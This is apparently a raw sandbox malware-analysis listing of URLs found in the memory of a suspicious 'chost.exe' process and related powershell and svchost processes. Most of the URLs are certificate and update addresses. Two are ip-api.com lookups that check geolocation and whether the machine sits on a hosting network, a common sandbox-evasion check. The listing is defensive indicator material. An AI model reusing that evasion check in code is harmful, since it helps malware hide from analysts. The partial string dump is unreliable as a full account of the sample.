Source: chost.exe, 00000010.00000003.2004224246.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2023023173.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2003687671.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2024109201.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2024298770.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022483004.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2002768779.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2025325913.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2024065098.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022045387.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2021422817.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022003495.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000002.2390966378.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2023023173.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2021380155.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2025346442.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2024298770.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2002560501.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2002967954.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022156527.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022045387.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: chost.exe, 00000011.00000002.2373846136.0000016E178B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
Source: chost.exe, 00000010.00000003.2023655023.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2023679527.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: powershell.exe, 0000004F.00000002.2286588093.0000014E184B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: chost.exe, 00000010.00000003.2023655023.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2023679527.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: chost.exe, 00000010.00000003.2023655023.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: svchost.exe, 0000000C.00000002.2916774796.0000026652200000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: chost.exe, 00000010.00000003.2023023173.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCer
Source: chost.exe, 00000010.00000003.2004224246.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2023023173.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2003687671.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2024109201.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2024298770.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022483004.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2002768779.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2025325913.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022045387.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2021422817.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022003495.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000002.2390966378.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2023023173.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2021380155.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022179110.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2025346442.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2024298770.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2002560501.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2002967954.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022156527.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022045387.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: chost.exe, 00000010.00000003.2004224246.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2023023173.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2003687671.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2024298770.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022483004.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2002768779.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2024065098.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022045387.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2021380155.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022179110.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2002560501.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2002967954.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022156527.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2003506905.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022003495.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2024276759.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2025346442.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2003307439.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2003942488.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2005749574.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.16.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: chost.exe, 00000010.00000003.2004224246.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2023023173.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2003687671.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2024298770.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2002768779.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2025325913.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2024065098.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022045387.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2021380155.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2002560501.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2002967954.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022179110.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2021422817.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2003506905.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022003495.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2025346442.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2003307439.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2003942488.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2005749574.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.16.dr, libssl-3.dll.16.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: _bz2.pyd.16.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: chost.exe, 00000010.00000003.2004224246.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2023023173.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2003687671.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2024298770.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022483004.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2002768779.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2024065098.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022045387.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2021380155.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022179110.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2002560501.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2002967954.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022156527.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2003506905.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022003495.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2024276759.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2025346442.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2003307439.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2003942488.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2005749574.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.16.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: chost.exe, 00000010.00000003.2023655023.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2023679527.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: chost.exe, 00000011.00000003.2032820492.0000016E16E40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
Source: svchost.exe, 0000000C.00000003.1975407820.0000026652418000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: svchost.exe, 0000000C.00000003.1975407820.0000026652418000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: svchost.exe, 0000000C.00000003.1975407820.0000026652418000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: svchost.exe, 0000000C.00000003.1975407820.0000026652418000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 0000000C.00000003.1975407820.0000026652418000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 0000000C.00000003.1975407820.0000026652418000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 0000000C.00000003.1975407820.000002665244D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: svchost.exe, 0000000C.00000003.1975407820.0000026652507000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: chost.exe, 00000011.00000003.2370358863.0000016E1731D000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2372629701.0000016E1731D000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2060721109.0000016E1731D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/
Source: chost.exe, 00000011.00000003.2370070368.0000016E17586000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2247819963.0000016E17585000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2373248659.0000016E17589000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2053657547.0000016E1758D000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2245289338.0000016E17583000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/mail/
Source: chost.exe, 00000011.00000002.2373248659.0000016E175FF000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2373846136.0000016E17961000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2053657547.0000016E175FF000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2370070368.0000016E175FF000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2245289338.0000016E175FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
Source: chost.exe, 00000011.00000002.2373027155.0000016E173B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/?fields=225545
Source: chost.exe, 00000011.00000002.2373027155.0000016E173B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: chost.exe, 00000010.00000003.2023655023.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2023679527.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: chost.exe, 00000010.00000003.2004224246.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2023023173.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2003687671.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2024298770.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022483004.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2002768779.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2024065098.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022045387.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2021380155.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022179110.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2002560501.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2002967954.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022156527.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2003506905.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022003495.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2024276759.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2025346442.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2003307439.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2003942488.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2005749574.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.16.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: chost.exe, 00000010.00000003.2004224246.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2023023173.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2003687671.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2024109201.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2024298770.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022483004.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2002768779.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2025325913.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2024065098.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022045387.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2021422817.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022003495.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000002.2390966378.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2023023173.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2021380155.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2025346442.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2024298770.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2002560501.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2002967954.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022156527.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022045387.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: chost.exe, 00000010.00000003.2004224246.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2023023173.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2003687671.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2024109201.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2024298770.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022483004.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2002768779.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2025325913.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022045387.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2021422817.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022003495.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000002.2390966378.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2023023173.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2021380155.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022179110.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2025346442.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2024298770.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2002560501.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2002967954.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022156527.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022045387.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: chost.exe, 00000010.00000003.2004224246.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2023023173.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2003687671.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2024298770.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2002768779.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2025325913.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2024065098.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022045387.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2021380155.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2002560501.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2002967954.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022179110.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2021422817.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2003506905.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022003495.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2025346442.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2003307439.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2003942488.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2005749574.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.16.dr, libssl-3.dll.16.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: chost.exe, 00000010.00000003.2023655023.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2023679527.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: chost.exe, 00000010.00000003.2023655023.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.thawte.com0
Source: chost.exe, 00000010.00000003.2023936005.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2023655023.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2023679527.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2023679527.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: chost.exe, 00000010.00000003.2023936005.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2023655023.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2023679527.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2023679527.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.symcd.com06
Source: powershell.exe, 00000019.00000002.2104672027.0000025739ED9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000019.00000002.2104672027.0000025739CB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004F.00000002.2251813408.0000014E00297000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000019.00000002.2104672027.0000025739ED9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: chost.exe, 00000011.00000002.2376400796.0000016E1833C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
Source: chost.exe, 00000010.00000003.2023936005.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2023655023.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2023679527.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2023679527.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: chost.exe, 00000010.00000003.2023655023.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: chost.exe, 00000010.00000003.2023936005.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2023655023.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2023679527.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2023679527.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: chost.exe, 00000010.00000003.2023655023.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: chost.exe, 00000010.00000003.2023655023.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: chost.exe, 00000010.00000003.2023936005.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2023655023.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2023679527.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2023679527.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
